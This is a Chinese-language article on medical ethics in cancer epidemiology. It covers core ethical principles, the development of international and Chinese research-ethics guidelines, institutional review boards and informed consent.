First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>guid</td></tr></table>
#### Traits
<details>
<summary>List of traits for the Relationship_BankAccountRelationshipId attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.dataFormat.guid**
**means.identity.entityId**
**is.linkedEntity.identifier**
Marks the attribute(s) that hold foreign key references to a linked (used as an attribute) entity. This attribute is added to the resolved entity to enumerate the referenced entities. <table><tr><th>Parameter</th><th>Value</th><th>Data type</th><th>Explanation</th></tr><tr><td>entityReferences</td><td>empty table</td><td>entity</td><td>a reference to the constant entity holding the list of entity references</td></tr></table>
**is.dataFormat.guid**
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#BackingTable_BankBillOfExchangeLayoutRelationshipId name="BackingTable_BankBillOfExchangeLayoutRelationshipId">BackingTable_BankBillOfExchangeLayoutRelationshipId</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>guid</td></tr></table>
#### Traits
<details>
<summary>List of traits for the BackingTable_BankBillOfExchangeLayoutRelationshipId attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.dataFormat.guid**
**means.identity.entityId**
**is.linkedEntity.identifier**
Marks the attribute(s) that hold foreign key references to a linked (used as an attribute) entity. This attribute is added to the resolved entity to enumerate the referenced entities. <table><tr><th>Parameter</th><th>Value</th><th>Data type</th><th>Explanation</th></tr><tr><td>entityReferences</td><td><table><tr><th>entityReference</th><th>attributeReference</th></tr><tr><td><a href="../../../Tables/Finance/Bank/Main/BankBillOfExchangeLayout.md" target="_blank">/core/operationsCommon/Tables/Finance/Bank/Main/BankBillOfExchangeLayout.cdm.json/BankBillOfExchangeLayout</a></td><td><a href="../../../Tables/Finance/Bank/Main/BankBillOfExchangeLayout.md#RecId" target="_blank">RecId</a></td></tr></table></td><td>entity</td><td>a reference to the constant entity holding the list of entity references</td></tr></table>
**is.dataFormat.guid**
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#Relationship_PrimaryCompanyContextRelationshipId name="Relationship_PrimaryCompanyContextRelationshipId">Relationship_PrimaryCompanyContextRelationshipId</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>guid</td></tr></table>
#### Traits
<details>
<summary>List of traits for the Relationship_PrimaryCompanyContextRelationshipId attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.dataFormat.guid**
**means.identity.entityId**
**is.linkedEntity.identifier**
Marks the attribute(s) that hold foreign key references to a linked (used as an attribute) entity. This attribute is added to the resolved entity to enumerate the referenced entities. <table><tr><th>Parameter</th><th>Value</th><th>Data type</th><th>Explanation</th></tr><tr><td>entityReferences</td><td><table><tr><th>entityReference</th><th>attributeReference</th></tr><tr><td><a href="../../../Tables/Finance/Ledger/Main/CompanyInfo.md" target="_blank">/core/operationsCommon/Tables/Finance/Ledger/Main/CompanyInfo.cdm.json/CompanyInfo</a></td><td><a href="../../../Tables/Finance/Ledger/Main/CompanyInfo.md#RecId" target="_blank">RecId</a></td></tr></table></td><td>entity</td><td>a reference to the constant entity holding the list of entity references</td></tr></table>
**is.dataFormat.guid**
**is.dataFormat.character**
**is.dataFormat.array**
</details>
| 37.561798 | 821 | 0.740951 | eng_Latn | 0.395305 |
e05402b55938141e2152b550f43e3c3a6a337eed | 75 | md | Markdown | README.md | mirazib71/StockManagementSystem-DB-Project | bbbcf8e4f45b8f5fae844368e035c1cb95043ed8 | [
"MIT"
] | null | null | null | README.md | mirazib71/StockManagementSystem-DB-Project | bbbcf8e4f45b8f5fae844368e035c1cb95043ed8 | [
"MIT"
] | null | null | null | README.md | mirazib71/StockManagementSystem-DB-Project | bbbcf8e4f45b8f5fae844368e035c1cb95043ed8 | [
"MIT"
] | null | null | null | # StockManagementSystem-DB-Project
CSE 3.2 DATABASE PROJECT USING JAVA GUI
| 25 | 39 | 0.826667 | yue_Hant | 0.842938 |
e05446beb24b9b627c74066e2d26064259bf58b8 | 319 | md | Markdown | README.md | melo0187/sales_record | 165b5f6d892a94dbaf1868fcc641bed875371392 | [
"MIT"
] | null | null | null | README.md | melo0187/sales_record | 165b5f6d892a94dbaf1868fcc641bed875371392 | [
"MIT"
] | null | null | null | README.md | melo0187/sales_record | 165b5f6d892a94dbaf1868fcc641bed875371392 | [
"MIT"
] | null | null | null | # Sales Record
A tool intended to record sales and receive reminders to solicit new business
Since this is my first serious attempt to build an Electron app it will be strongly based on [Electron API Demos](https://github.com/electron/electron-api-demos)
## Attributions
Uses Icon from http://www.doublejdesign.co.uk/ | 45.571429 | 161 | 0.793103 | eng_Latn | 0.97816 |
e0544a7bd098206ebfb2fbf14de2beb1213ccb69 | 3,607 | md | Markdown | Assets/xNode/README.md | AphexRebellion/Synthesize | 5e958500c62e19ff3b651297e493a6ed5dc92e00 | [
"MIT"
] | 3 | 2021-11-09T21:12:19.000Z | 2022-03-11T23:39:40.000Z | Assets/xNode/README.md | AphexRebellion/Synthesize | 5e958500c62e19ff3b651297e493a6ed5dc92e00 | [
"MIT"
] | null | null | null | Assets/xNode/README.md | AphexRebellion/Synthesize | 5e958500c62e19ff3b651297e493a6ed5dc92e00 | [
"MIT"
] | null | null | null | [](https://discord.gg/qgPrHv4)
[](https://github.com/Siccity/xNode/issues)
[](https://raw.githubusercontent.com/Siccity/xNode/master/LICENSE.md)
[](https://github.com/Siccity/xNode/wiki)
[Downloads](https://github.com/Siccity/xNode/releases) / [Asset Store](http://u3d.as/108S) / [Documentation](https://github.com/Siccity/xNode/wiki)
### xNode
Thinking of developing a node-based plugin? Then this is for you. You can download it as an archive and unpack to a new unity project, or connect it as git submodule.
xNode is super userfriendly, intuitive and will help you reap the benefits of node graphs in no time.
With a minimal footprint, it is ideal as a base for custom state machines, dialogue systems, decision makers etc.

### Key features
* Lightweight in runtime
* Very little boilerplate code
* Strong separation of editor and runtime code
* No runtime reflection (unless you need to edit/build node graphs at runtime. In this case, all reflection is cached.)
* Does not rely on any 3rd party plugins
* Custom node inspector code is very similar to regular custom inspector code
### Wiki
* [Getting started](https://github.com/Siccity/xNode/wiki/Getting%20Started) - create your very first node node and graph
* [Examples branch](https://github.com/Siccity/xNode/tree/examples) - look at other small projects
### Node example:
```csharp
[System.Serializable]
public class MathNode : Node {
// Adding [Input] or [Output] is all you need to do to register a field as a valid port on your node
[Input] public float a;
[Input] public float b;
// The value of an output node field is not used for anything, but could be used for caching output results
[Output] public float result;
[Output] public float sum;
// The value of 'mathType' will be displayed on the node in an editable format, similar to the inspector
public MathType mathType = MathType.Add;
public enum MathType { Add, Subtract, Multiply, Divide}
// GetValue should be overridden to return a value for any specified output port
public override object GetValue(NodePort port) {
// Get new a and b values from input connections. Fallback to field values if input is not connected
float a = GetInputValue<float>("a", this.a);
float b = GetInputValue<float>("b", this.b);
// After you've gotten your input values, you can perform your calculations and return a value
if (port.fieldName == "result")
switch(mathType) {
case MathType.Add: default: return a + b;
case MathType.Subtract: return a - b;
case MathType.Multiply: return a * b;
case MathType.Divide: return a / b;
}
else if (port.fieldName == "sum") return a + b;
else return 0f;
}
}
```
Join the [Discord](https://discord.gg/qgPrHv4 "Join Discord server") server to leave feedback or get support.
Feel free to also leave suggestions/requests in the [issues](https://github.com/Siccity/xNode/issues "Go to Issues") page.
Projects using xNode:
* [Graphmesh](https://github.com/Siccity/Graphmesh "Go to github page")
* [Dialogue](https://github.com/Siccity/Dialogue "Go to github page")
| 51.528571 | 166 | 0.71583 | eng_Latn | 0.873997 |
e0548297ddfee62a6de9dffd485b742f3d88424f | 1,705 | md | Markdown | README.md | alexa/apl-viewhost-web | 1d8703f23eec28f888e83416aa1a18dfc3af1f53 | [
"Apache-2.0"
] | 14 | 2020-08-27T00:25:18.000Z | 2022-03-30T20:18:33.000Z | README.md | rcoleworld/apl-viewhost-web | d5aa444a5233a6b9a372d61eac857bfd6f31c107 | [
"Apache-2.0"
] | 9 | 2020-08-05T04:19:55.000Z | 2022-03-25T19:16:36.000Z | README.md | rcoleworld/apl-viewhost-web | d5aa444a5233a6b9a372d61eac857bfd6f31c107 | [
"Apache-2.0"
] | 6 | 2020-09-25T11:01:12.000Z | 2022-03-30T20:16:18.000Z | # Alexa Presentation Language (APL) Viewhost Web
<p>
<a href="https://github.com/alexa/apl-viewhost-web/tree/v1.8.0" alt="version">
<img src="https://img.shields.io/badge/stable%20version-1.8.0-brightgreen" /></a>
<a href="https://github.com/alexa/apl-core-library/tree/v1.8.1" alt="APLCore">
<img src="https://img.shields.io/badge/apl%20core%20library-1.8.1-navy" /></a>
</p>
## Introduction
The APL ViewHost Web is language-specific APL "view host", which is responsible for performing the rendering in the Web
platform or framework for which the view host was designed by leveraging the functionality and support from [APL Core library](https://github.com/alexa/apl-core-library).
## Installation
### Prerequisites
* [NodeJS](https://nodejs.org/en/) - version 10.x or higher
* [cmake](https://cmake.org/install/) - the easiest way to install on Mac is using `brew install cmake`
* [Yarn](https://yarnpkg.com/getting-started/install)
### Installation Steps
The easiest way to use apl-viewhost-web is to install it from npm and build it into your app with webpack.
```
npm install apl-viewhost-web
```
**note**: The package install will pull and build [APL Core library](https://github.com/alexa/apl-core-library) locally,
this make take a while.
## Security
See [CONTRIBUTING](CONTRIBUTING.md#security-issue-notifications) for more information.
## License
This project is licensed under the Apache-2.0 License. Proprietary fonts are not licensed under an open source license, but instead subject to Amazon’s Trademark Guidelines, available [here](https://developer.amazon.com/support/legal/tuabg#trademark). Please see the [LICENSE](fonts/LICENSE.txt) file in the fonts sub-directory.
| 41.585366 | 328 | 0.750147 | eng_Latn | 0.844708 |
e054a4fc2e00d2746ae24ab60b24ee6b8a42d8c8 | 2,898 | md | Markdown | README.md | soulman-is-good/pg-git | 5adb3271044fdaf2cc042e3d69d94fab820b6f64 | [
"MIT"
] | 1 | 2021-01-13T01:21:31.000Z | 2021-01-13T01:21:31.000Z | README.md | soulman-is-good/pg-git | 5adb3271044fdaf2cc042e3d69d94fab820b6f64 | [
"MIT"
] | 4 | 2017-03-12T13:46:24.000Z | 2021-05-10T01:37:45.000Z | README.md | soulman-is-good/pg-git | 5adb3271044fdaf2cc042e3d69d94fab820b6f64 | [
"MIT"
] | null | null | null | ### PostgreSQL simple code dumping tool with diff migration
  
**Best used with git** :octocat:
This tool was written to help migrate between different servers and to help with distributed development on PostgreSQL.
Tool will automatically download latest Postgres binaries for the platform unless `NO_DOWNLOAD` env or `--no_download` flag is specified.
Else tool will try to use system default `pg_dump` and `psql` files.
WARNING: This tool uses and bundles:
- [apgdiff](https://github.com/fordfrog/apgdiff) v2.6 jar file (requires Java VM)
**node >=11.0.0**
If you want to override this to yours binaries, e.g. system defaulted, then use envirnoment variables or cli params described below.
#### Usage
Commonly tool was develop as standalone and to install as dependency to use with npm. But you can also `require`
it within you project, not much use of it that way though.
```js
const { dump, diff, apply, StringStream } = require('pg-git');
const options = {
user: 'postgres',
password: 'postgres',
database: 'postgres',
host: 'localhost',
port: 5432,
noDownload: true,
};
const newDump = new StringStream('CREATE TABLE public.test(id integer);');
// dump current database, make a diff and apply
dump(options)
.then(dumpStream => diff(options, dumpStream, newDump))
.then(diffStream => apply(options, diffStream))
.catch(console.error);
```
Or you can install tool globaly (or localy and use with npm run ...)
```
npm i -g pg-git
```
And use it in your project
Usage
```
pgit [options] <command>
Commands:
commit - Create new dump
migrate - Make a diff with dump file and apply it to database
Options:
--user <USERNAME> - database user
--password <PASSWORD> - database password
--host <HOST> - pg host
--port <PORT> - database port
--dumpname <dumpname> - dump file name. default: dump.sql
--pgversion <version> - postgres version to use. Specify exact version or only part else latest will be taken. E.g. 10 or 9.5 or 9.4.21
--psql <path> - path to psql binary
--pg_dump <path> - path to pg_dump binary
--no_download <any> - do not download binaries from external resource
```
Example
```
pg-git --user postgres --password postgres --host 127.0.0.1 --port 5432 commit my_database
```
#### Environment variables
```
PGUSER - Postgres user
PGHOST - Postgres host
PGDATABASE - Postgres database name
PGPASSWORD - Postgres password for user
PGVERSION - postgres version to use. Specify exact version or only part else latest will be taken. E.g. 10 or 9.5 or 9.4.21
PSQL_PATH - Absolute path to your psql binary file
PG_DUMP_PATH - Absolute path to yout pg_dump binary file
NO_DOWNLOAD - do not download binaries from external resource
```
| 31.846154 | 195 | 0.728433 | eng_Latn | 0.934164 |
e05587e8556929b5d23788757ec8e82b93187b82 | 902 | md | Markdown | dynamics-nav/FINDFIRSTFIELD-Function--TestPage-.md | dennisroczek/navdevitpro-content-pr | 1bf11f3f948c600e3d1426bb9ab5d1d6dd1db4f7 | [
"CC-BY-4.0",
"MIT"
] | 3 | 2020-01-20T03:29:28.000Z | 2021-04-21T00:13:46.000Z | dynamics-nav/FINDFIRSTFIELD-Function--TestPage-.md | dennisroczek/navdevitpro-content-pr | 1bf11f3f948c600e3d1426bb9ab5d1d6dd1db4f7 | [
"CC-BY-4.0",
"MIT"
] | 260 | 2019-10-31T19:29:48.000Z | 2022-03-30T20:46:14.000Z | dynamics-nav/FINDFIRSTFIELD-Function--TestPage-.md | dennisroczek/navdevitpro-content-pr | 1bf11f3f948c600e3d1426bb9ab5d1d6dd1db4f7 | [
"CC-BY-4.0",
"MIT"
] | 13 | 2019-12-06T15:06:58.000Z | 2022-03-23T22:01:57.000Z | ---
title: "FINDFIRSTFIELD Function (TestPage)"
ms.custom: na
ms.date: 06/04/2016
ms.reviewer: na
ms.suite: na
ms.tgt_pltfrm: na
ms.topic: article
ms.prod: "dynamics-nav-2018"
ms.assetid: 91c8fec5-7f57-431b-93d1-a238e9249e7b
caps.latest.revision: 7
manager: edupont
---
# FINDFIRSTFIELD Function (TestPage)
Finds the first field in the dataset that is displayed on a test page.
## Syntax
```
[Ok :=] TestPage.FINDFIRSTFIELD(Field, Value);
```
#### Parameters
*TestPage*
Type: TestPage
The test page that contains the dataset that you want to find.
*Field*
Type: Field
The field to find.
*Value*
Type: Any
The value of the field.
## Property Value/Return Value
Type: Boolean
**true** if the first field is found; otherwise, **false**. The return value is optional.
## See Also
[TestPage Functions](TestPage-Functions.md) | 20.044444 | 92 | 0.675166 | eng_Latn | 0.720792 |
e055b31812b3f017c08166a2cff0f61bc02457db | 5,725 | md | Markdown | README.md | CodeLingoBot/roving | 08bb7cf374ba5fca2b3764f293c579f36aa93a2a | [
"MIT"
] | null | null | null | README.md | CodeLingoBot/roving | 08bb7cf374ba5fca2b3764f293c579f36aa93a2a | [
"MIT"
] | null | null | null | README.md | CodeLingoBot/roving | 08bb7cf374ba5fca2b3764f293c579f36aa93a2a | [
"MIT"
] | null | null | null | Roving
======
Distributed fuzzing using AFL.
# Overview
## AFL
AFL is a "fuzzer". You give it a target program, and it runs that target
program zillions of times, trying to find input that causes it to crash.
It uses instrumentation of the target program's code to try to manipulate its
input so that it explores as much of the target program as possible.
## Roving
A roving cluster runs multiple copies of AFL on multiple machines, all
fuzzing the same target. Roving's key contribution is to allow these
machines to share and benefit from each other's work. If machine A finds
an "interesting" test case that causes a new function to get invoked,
machines B, C and D can all use this discovery to explore the rest of
the program more efficiently.
### Cluster structure
A roving cluster consists of 1 server and N clients. Each client runs M
copies of AFL (using AFL's existing parallelism settings), and uses the
server to share their work with their peers. Each fuzzer on the client
periodically (by default, every 5 mins) uploads to the server their
current AFL state, including their queue. The server saves these states
in memory.
Fuzzers take advantage of the work of their peers by downloading
from the server the state of all clients in the cluster. They replace
their current queue with the combined queues of all clients, and then
continue fuzzing as before. This allows all clients to benefit from the
new, interesting testcases that any individual client discovers.
This approach relies on the non-determinism of AFL. If every client
deterministically ran the same test cases when given the same queue,
we would simply be repeating the same work N times across N different
clients. In reality, clients take the same queue and run in wildly
different directions with it. This means that we cover more of the search
space, faster.
That said, there is no formal partitioning of work, and there *will* be
some amount of duplication of work between clients. We do not currently
have any estimates of how much work is duplicated, but it is safe to say
that running 10 roving clients will not get you 10x the edge-discovery
rate of 1 client. Roving uses the same principle as AFL's own
single-machine parallelism, so we still have good reason to believe
that it is effective.
# Usage
## Bazel
For now roving uses [Bazel][https://docs.bazel.build/versions/master/install.html]
for its build. You'll need to download it in order to build roving.
## Roving Server
* Export `AFL` with the path to afl, or make sure `afl-fuzz` is on `PATH`
* In the workdir, create a `target` binary [optional]
* In the workdir, make a directory called `input` and populate it with a corpus
* Run `bazel build //cmd/srv`
* Run `bazel-bin/cmd/srv/darwin_amd64_stripped/srv`
Once up, it will create a directory called `output` that mirrors the
structure of the `output` directory created by AFL. It will aggregate
crashes, hangs, and the queue.
There is also a basic (but improving!) admin page at `SERVER_URL:SERVER_PORT/admin`.
## Roving Clients
Clients should require almost no configuration.
* Run `bazel build //cmd/client`
* Run `bazel-bin/cmd/client/darwin_amd64_stripped/client -- -server-hostport XYZ:123 -parallelism X`
Clients will accumulate crashes and hangs in their working dir. They will
sync them to the server.
## Advanced usage
Run the compiled binaries with the `-help` flag or see the files in the `cmd/`
folder for advanced options.
# Development
## Tests
The test suite is not particularly extensive, but you can run it
using:
```
bin/test
```
## Design principles
### Roving clients should be very dumb
Roving clients should be very dumb and have very
little configuration. This is so that clients can easily
be brought up, pointed at any roving server of any type, and
quickly start working.
If a roving server requires clients to be configured
in a particular way (perhaps the server wants them
to sync their work with it more frequently than normal),
this should be passed as configuration to the *server*,
which should then send it to the client when it starts up
and joins the cluster.
### Fuzzer-agnosticism is good but currently not essential
We would like roving to be fuzzer-agnostic in the future. It should be
possible to power your fuzzing using `afl`, `libfuzzer`, `hongfuzz`, or
any other reasonable fuzzer.
All of these fuzzers work in somewhat different ways and have somewhat
different structures and opinions. We are comfortable loosely coupling
ourselves to `afl` for now - for example, we assume that fuzzer input and
output is structured in the way that `afl` expects. However, we would like
multi-fuzzer support to be an achievable goal in the future, and would like
to avoid making decisions that would make this unreasonably difficult.
## Running the examples
The example code bash scripts live in the `examples/` directory.
### C
* `examples/c-server` to build the target and run the example server serving the C example target on the default port 1414
* `examples/generic-client` to run the example client
Your client should find a crash within 30 seconds.
### Ruby
* [Install `afl-ruby`][afl-ruby]
* `examples/ruby-server` to run the example server serving the Ruby example target on the default port 1414
* `examples/generic-client` to run the example client
Your client should again find a crash within 30 seconds.
# Why Roving?
I asked some of my coworkers what they'd name a distributed fuzzy thing.
Evidently [roving][0] is extremely fuzzy, and winds up **everywhere** when
you're working with it. Plus the testcases go roving and it's all very poetic.
[0]: https://en.wikipedia.org/wiki/Roving
[afl-ruby]: https://github.com/richo/roving
| 36.006289 | 122 | 0.775895 | eng_Latn | 0.999515 |
e05609151488a44a2a67693fc18342ee69a5d56b | 410 | md | Markdown | docs/assembler/masm/group.md | Dinja1403/cpp-docs | 50161f2a9638424aa528253e95ef9a94ef028678 | [
"CC-BY-4.0",
"MIT"
] | 3 | 2021-02-19T06:12:36.000Z | 2021-03-27T20:46:59.000Z | docs/assembler/masm/group.md | Dinja1403/cpp-docs | 50161f2a9638424aa528253e95ef9a94ef028678 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/assembler/masm/group.md | Dinja1403/cpp-docs | 50161f2a9638424aa528253e95ef9a94ef028678 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2020-12-24T04:34:32.000Z | 2020-12-24T04:34:32.000Z | ---
title: "GROUP"
ms.date: "11/05/2019"
f1_keywords: ["group"]
helpviewer_keywords: ["GROUP directive"]
ms.assetid: 55dc9548-154e-486d-849a-135e4631eca9
---
# GROUP
(32-bit MASM only.) Add the specified *segments* to the group called *name*.
## Syntax
> *name* **GROUP** *segment* ⟦__,__ *segment* ...⟧
## See also
[Directives reference](directives-reference.md)\
[MASM BNF Grammar](masm-bnf-grammar.md)
| 20.5 | 76 | 0.695122 | eng_Latn | 0.477778 |
e0560c7276b95fa16bb64166979fc7eae347c548 | 676 | md | Markdown | README.md | mchmarny/dapr-state-store-change-handler | 1e93dbaecd798af314f683ad4a6c37e217fc5762 | [
"MIT"
] | null | null | null | README.md | mchmarny/dapr-state-store-change-handler | 1e93dbaecd798af314f683ad4a6c37e217fc5762 | [
"MIT"
] | null | null | null | README.md | mchmarny/dapr-state-store-change-handler | 1e93dbaecd798af314f683ad4a6c37e217fc5762 | [
"MIT"
] | null | null | null | # Dapr State Change Publisher
## Components
### Source
```yaml
apiVersion: dapr.io/v1alpha1
kind: Component
metadata:
name: changes
spec:
type: digitaltwins.rethinkdb.statechange
metadata:
- name: address
value: "127.0.0.1:28015"
- name: database
value: "dapr"
```
### Target
```yaml
apiVersion: dapr.io/v1alpha1
kind: Component
metadata:
name: events
spec:
type: pubsub.redis
metadata:
- name: redisHost
value: localhost:6379
- name: redisPassword
value: ""
```
## Service
```shell
dapr run --app-id publisher \
--protocol grpc \
--app-port 50001 \
--components-path ./config \
go run main.go
``` | 15.022222 | 42 | 0.634615 | eng_Latn | 0.256506 |
e0562f5f71371e2ef06d215aa9a90a8b384ba230 | 1,496 | md | Markdown | README.md | bobc/maple-asp | b3b57daa42133f0038e6269c09f837edd907ef45 | [
"MIT"
] | 19 | 2015-01-14T17:58:04.000Z | 2020-11-05T05:33:08.000Z | README.md | bobc/maple-asp | b3b57daa42133f0038e6269c09f837edd907ef45 | [
"MIT"
] | 1 | 2015-07-19T07:21:21.000Z | 2015-07-19T23:04:56.000Z | README.md | bobc/maple-asp | b3b57daa42133f0038e6269c09f837edd907ef45 | [
"MIT"
] | 12 | 2015-03-12T13:32:20.000Z | 2021-02-18T21:06:42.000Z | Arduino Support Package For Maple
=================================
Background
----------
Maple is a series of Arduino like boards created by LeafLabs (http://www.leaflabs.com/).
LeafLabs provided a version of the Arduino IDE tailored for Maple https://github.com/leaflabs/maple-ide
but it is no longer supported, and uses an old version of the Arduino IDE.
maple-asp provides support for Maple compatible boards for use with the "new" Arduino IDE 1.5.x, without requiring
any modifications to the Arduino IDE.
The bulk of maple-asp is the libmaple code https://github.com/leaflabs/libmaple, in the form of an Arduino add on package.
maple-asp
---------
Currently the following boards are supported:
- Maple Rev 3+
Installing
----------
Pre-requisites:
- Arduino IDE version 1.5.7 or later
Installation procedure:
1. Copy the Arduino/hardware/ folder to your sketchbook folder (e.g. ~/Arduino)
2. Restart Arduino IDE
Note: maple-asp is designed to be installed into your sketchbook, not the Arduino program folder, otherwise
it will not work properly.
TODO
----
- Implement all the board/memory variants
- create wrapper utility for DFU download
- support for linux
- build and test examples
Licenses
--------
maple-asp is an Open Source project.
libmaple is mostly licensed with MIT license.
Other files are licensed as GPL or BSD.
Please see individual files for Copyright notices.
Main Contributors
-----------------
- LeafLabs (maple-ide, libmaple)
- Bob Cousins
| 24.129032 | 126 | 0.727941 | eng_Latn | 0.987854 |
e0564eb03e16aaf47e08ec8d3ab953978f8d589d | 87 | md | Markdown | README.md | gpatricia223/devJobz-project_12 | 1cf3daef6c608f1cb00111d30a48c2c4f856cae1 | [
"MIT"
] | null | null | null | README.md | gpatricia223/devJobz-project_12 | 1cf3daef6c608f1cb00111d30a48c2c4f856cae1 | [
"MIT"
] | null | null | null | README.md | gpatricia223/devJobz-project_12 | 1cf3daef6c608f1cb00111d30a48c2c4f856cae1 | [
"MIT"
] | null | null | null | # devJobz-project_12
Student project app. Using REST APIs, Node, jQuery, and the rest.
| 29 | 65 | 0.770115 | eng_Latn | 0.649962 |
e0568958b094355af9f8bb7765609486b1d61278 | 1,349 | md | Markdown | _posts/2019-04-10-61.Reactor.md | liangjfblue/liangjfblue.github.io | 073de25c97fd059d5820ce9912ffe7229e0680c0 | [
"MIT"
] | null | null | null | _posts/2019-04-10-61.Reactor.md | liangjfblue/liangjfblue.github.io | 073de25c97fd059d5820ce9912ffe7229e0680c0 | [
"MIT"
] | 2 | 2018-02-16T15:23:31.000Z | 2018-02-16T15:29:47.000Z | _posts/2019-04-10-61.Reactor.md | liangjfblue/liangjfblue.github.io | 073de25c97fd059d5820ce9912ffe7229e0680c0 | [
"MIT"
] | null | null | null | ---
layout: post
title: Reactor模型
subtitle: Reactor模型的迭代进化
date: 2019-04-14
author: Liangjf
header-img: img/post-bg-github-cup.jpg
catalog: true
tags:
- 网络编程
---
> **BIO模型**

> 主要瓶颈在线程上。每个连接都会建立一个线程。虽然线程消耗比进程小,但是一台机器实际上能建立的有效线程有限
------------------------------------------------------------
> **NIO模型**

> 由于是非阻塞的,应用无法知道什么时候消息读完了,就存在了半包问题
------------------------------------------------------------
> **Reactor单线程模型**

> 客户端多次进行请求,如果在Handler中的处理速度较慢,那么后续的客户端请求都会被积压,导致响应变慢
------------------------------------------------------------
> **Reactor多线程模型**

> Reactor既要处理IO操作请求,又要响应连接请求,会出现瓶颈
------------------------------------------------------------
> **主从Reactor模型**

> 主Reactor用于响应连接请求,从Reactor用于处理IO操作请求 | 43.516129 | 102 | 0.564122 | yue_Hant | 0.121463 |
e056902c28b0686cf322adf073d9d7cb74d4b926 | 4,220 | md | Markdown | content/cn/2020-04-16-ethics.md | gigu003/www.chenq.site | 4011d234e02cf083811f834bb8f1248f3e0c1d5d | [
"MIT"
] | 1 | 2021-07-25T15:00:06.000Z | 2021-07-25T15:00:06.000Z | content/cn/2020-04-16-ethics.md | gigu003/www.chenq.site | 4011d234e02cf083811f834bb8f1248f3e0c1d5d | [
"MIT"
] | null | null | null | content/cn/2020-04-16-ethics.md | gigu003/www.chenq.site | 4011d234e02cf083811f834bb8f1248f3e0c1d5d | [
"MIT"
] | null | null | null | ---
title: "医学伦理学在肿瘤流行病学中的应用"
author: "Qiong Chen"
date: '2020-04-16'
slug: ethics
tags:
- 伦理
categories:
- Epidemiology
---
1964年在第18届世界医学大会通过的生物学和药学临床研究指南《赫尔辛基宣言》、国际医学科学组织委员会颁布的《人体生物医学研究国际道德指南》和国际流行病学协会制定的流行病学研究的伦理学条约,均明确指出了生物医学研究的四个基本伦理学原则,即自主性、有益性、无害性和公平性。
在开展肿瘤流行病学研究中主要涉及的伦理问题包括知情同意、隐私保护等,传统的观察性研究所涉及的伦理主要有研究目的知情、自主决策权、个人或家庭资料的披露、筛查的伦理问题、研究资料的归属权、调查参与者和地区分布的公平性、研究结果的传播和疾病监测过程的伦理问题。随着肿瘤流行病学研究范畴的拓展,研究对象从宏观发展至微观,研究者面临的伦理学问题也日益突出,涉及的伦理问题包括个体生物标本和个人信息采集的知情同意、基因的私密性问题和基因歧视问题。而近年来开展的肿瘤临床试验中,干预的随机化过程也面临伦理学抉择问题。
随着肿瘤流行病学的不断发展,也在不断出现新的伦理学问题,如何正确认识研究伦理学意义,解决伦理学冲突,保护研究对象的权益,成为目前研究关注的重点之一。
## 国内外流行病学研究伦理规范的发展
国际上流行病学研究伦理规范的发展较早,1985年美国流行病学学会(ACE)批准成立伦理和行为规范委员会,1989年美国流行病学杂志发表“Epidemiology: Questions Of Science, Ethics, Morality, And Law”,专门论述了流行病学研究中的伦理学问题1。1990年,国际流行病学学会召开伦理研讨会,讨论流行病学伦理准则草案。1991年,国际医学科学组织理事会(CIOMS)出版了“伦理学和流行病学的国际准则”,内容涉及流行病学工作者信息传播的责任问题、对研究对象的责任问题以及针对流行病学工作者的伦理指南。2002年CIOMS和世界卫生组织(WHO)修订《国际流行病学研究伦理指南》,2008年再次修订,是目前指导流行病学研究的权威性的伦理指导文件。
我国对流行病学研究中的伦理问题的重视程度不足,与国际上有一定差距。目前,我国还没有出台流行病学伦理问题的规范法规。我国医学伦理相关规范的发展起始于1998年卫生部颁布的“涉及人体的生物医学研究伦理审查办法”,2007年正式发布《涉及人的生物医学研究伦理审查办法(试行)》,2016年9月30日国家卫生计生委委主任会议讨论通过《涉及人的生物医学研究伦理审查办法》,并于2016年12月1日起正式施行2。
国内关于流行病学伦理问题的研究仍然相对匮乏,《中华流行病学杂志》和《American Journal of Epidemiology》分别作为发表中国和美国流行病学研究成果的主要期刊,孟若谷等人2012年对比了两刊2006年至2012年期刊研究论文的伦理学问题,发现中国在伦理审查、采集受试者生物标本和隐私信息的伦理意识等方面与美国均存在较大差距,但两刊伦理意识均呈逐年上升趋势3。
## 伦理学在我国肿瘤流行病学研究中的应用
### 伦理委员会
19世纪80年代初期,国内尚无伦理审查管理条例,中国医学科学院肿瘤研究所同美国国家卫生研究院国立癌症研究所合作开展大规模的肿瘤流行病学研究时,就建立了伦理委员会(Institutional review board, IRB),遵循国际准则开展伦理审查,包括研究设计合理性、益处与风险以及安慰剂对照的采用等。多次获得NIH保护人类研究对象委员会的“单一项目认证”(single project assurance, SPA)。在云南锡矿工肺癌早诊早治研究中,为确保高危人群的自我权益得到充分保护,有一定数据量的矿工代表参加到普查队,并有一位工会的代表成为云锡劳动防护研究所IRB的成员4。
### 知情同意
知情同意赋予受试者自我选择并决定是否参加的权利,它包含了“知情”和“同意”两部分密切相关的内容。概括起来有研究目的、自愿参加、益处与风险、保密性、联系人和赔偿等6点基本要素。在流行病学研究中,不仅要做到受试者在形式上知情同意,而且要使知情同意工作在实质上达到应有的伦理学标准。但在获取知情同意的过程中,要避免对未来受试者的不正当影响。
